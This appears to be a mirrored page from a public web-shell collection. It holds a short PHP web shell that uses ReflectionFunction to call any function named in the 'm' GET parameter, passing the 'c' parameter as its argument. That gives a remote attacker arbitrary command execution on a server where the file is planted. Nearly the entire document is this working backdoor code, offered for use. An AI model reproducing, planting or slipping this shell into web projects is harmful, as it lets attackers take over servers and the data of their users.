mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
281 B
281 B
![Title alt text](/Mirrors/webshell/media/commit/638c20250e8e1715a735bb306196e8f01ee797b9/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>